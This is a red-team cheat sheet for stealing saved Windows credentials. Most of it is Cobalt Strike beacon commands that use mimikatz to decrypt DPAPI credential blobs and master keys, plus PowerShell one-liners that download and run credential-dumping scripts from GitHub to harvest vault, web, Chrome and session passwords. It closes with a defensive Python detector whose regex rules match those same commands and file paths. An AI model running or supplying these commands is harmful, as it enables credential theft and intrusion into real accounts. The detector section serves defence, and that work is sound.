DPAPI

Credential Manager

# Location
beacon> ls C:\Users\bfarmer\AppData\Local\Microsoft\Credentials

# OR
beacon> run vaultcmd /listcreds:"Windows Credentials" /all

# OR
beacon> mimikatz vault::list

# Dump The Encrypted Data (pbData, guidMasterKey)
beacon> mimikatz dpapi::cred /in:C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\9D54C839752B38B233E5D56FDD7891A7

# Get Master Key (Key)
beacon> mimikatz dpapi::masterkey /in:C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-3263068140-2042698922-2891547269-1120\a23a1631-e2ca-4805-9f2f-fe8966fd8698 /rpc 

# Decrypting
beacon> mimikatz dpapi::cred /in:C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\9D54C839752B38B233E5D56FDD7891A7 /masterkey:0c0105785f89063857239915037fbbf0ee049d984a09a7ae34f7cfc31ae4e6fd029e6036cde245329c635a6839884542ec97bf640242889f61d80b7851aba8df 

Windows Credentials Manager

IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1')
Invoke-WCMDump

Web Credentials Manager

IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-WebCredentials.ps1')
Get-WebCredentials

Google Chrome

# Location
beacon> ls C:\Users\bfarmer\AppData\Local\Google\Chrome\User Data\Default

# Extract
# https://github.com/djhohnstein/SharpChromium
beacon> execute-assembly C:\Tools\SharpChromium\bin\Debug\SharpChromium.exe logins 

Chrome Passwords

https://github.com/ohyicong/decrypt-chrome-passwords/raw/main/decrypt_chrome_password.exe

Chrome History

IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ChromeDump.ps1')
Get-ChromeDump > chromepwds.txt

Other Saved Credentials

IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1')
Invoke-SessionGopher -Thorough
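
Seen from the defender's side, the commands above leave traces in process-creation, PowerShell script-block and file-access logs. The following is an added example, not part of the original page or of any tool it links: the patterns are taken from the command lines and paths shown above, while the event tuple layout `(kind, image, text)`, the reader allowlist and the sample events are assumptions constructed for illustration.

```python
import re

# Patterns derived from the commands and paths on this page.
# Each rule: (name, event kind it applies to, compiled pattern).
RULES = [
    ("vault-enum", "process", re.compile(r"\bvaultcmd(\.exe)?\b.*?/listcreds", re.I)),
    ("download-cradle", "scriptblock",
     re.compile(r"DownloadString\(\s*['\"]https?://raw\.githubusercontent\.com/", re.I)),
    ("cred-dump-function", "scriptblock",
     re.compile(r"\b(Invoke-WCMDump|Get-WebCredentials|Get-ChromeDump|Invoke-SessionGopher)\b", re.I)),
    ("dpapi-blob-read", "file", re.compile(r"\\AppData\\Local\\Microsoft\\Credentials\\", re.I)),
    ("dpapi-masterkey-read", "file",
     re.compile(r"\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-", re.I)),
    ("chrome-profile-read", "file", re.compile(r"\\Google\\Chrome\\User Data\\Default\\", re.I)),
]

# Images expected to read these paths (assumption; build yours from a baseline).
EXPECTED_READERS = {"lsass.exe", "chrome.exe"}

def detect(events, expected_readers=EXPECTED_READERS):
    """Return (event_index, rule_name) for every rule an event matches."""
    hits = []
    for i, (kind, image, text) in enumerate(events):
        exe = image.rsplit("\\", 1)[-1].lower()
        for name, rule_kind, pattern in RULES:
            if kind != rule_kind or not pattern.search(text):
                continue
            if kind == "file" and exe in expected_readers:
                continue  # read by a baseline process, not reported
            hits.append((i, name))
    return hits

# Constructed sample events (hypothetical schema: kind, process image, text).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
HOME = r"C:\Users\bfarmer\AppData"
SAMPLE_EVENTS = [
    ("process", r"C:\Windows\System32\VaultCmd.exe", 'vaultcmd /listcreds:"Windows Credentials" /all'),
    ("scriptblock", PS,
     "IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/CONSTRUCTED/script.ps1')"),
    ("scriptblock", PS, "Invoke-SessionGopher -Thorough"),
    ("file", r"C:\Windows\System32\rundll32.exe", HOME + r"\Local\Microsoft\Credentials\CRED-BLOB"),
    ("file", r"C:\Windows\System32\lsass.exe",
     HOME + r"\Roaming\Microsoft\Protect\S-1-5-21-1111-2222-3333-1001\MASTERKEY-GUID"),
    ("file", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     HOME + r"\Local\Google\Chrome\User Data\Default\Login Data"),
    ("process", r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
]

if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(idx, rule, SAMPLE_EVENTS[idx][1])
```

The file rules only become useful once object-access auditing is enabled on the `Credentials`, `Protect` and Chrome profile directories; without it, only the process and script-block rules have data to match.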
